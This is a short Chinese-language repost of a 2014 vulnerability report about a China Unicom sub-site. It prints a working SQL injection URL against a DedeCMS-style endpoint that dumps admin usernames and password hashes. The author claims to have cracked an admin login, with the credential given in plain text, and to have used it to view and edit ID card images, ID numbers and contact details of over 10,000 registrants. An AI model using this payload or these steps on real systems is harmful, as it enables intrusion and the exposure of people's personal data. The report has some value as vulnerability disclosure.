中国联通10010分站SQL注入导致用户资料泄露下载

来源:黑吧安全网 浏览:1195次 时间:2014-04-28
做网站找雨过天晴工作室

中国联通10010分站SQL注入导致用户资料泄露

http://pingpang.10010.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\'and+char(@`'`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,group_concat(userid,0x23,pwd),5,6,7,8,9 from `%23@__admin`%23

如图

经过密码破译了一个账号,为cyber 111111

不过你们这次修补漏洞还真不错隐藏了后台,要不然哈哈,危害就更大了,,通过查找我找到了一个乒乓球报名管理员系统,用刚破译的用户密码登陆可以查看所有报名人员的身份证图片、身份证号,电话号码,邮箱,姓名工作单位、姓名等重要姓名,如图:

还可以修改信息,哈哈,1W多数据!

 

修复方案:

修复的话你们的运维人员比我们更专业。。。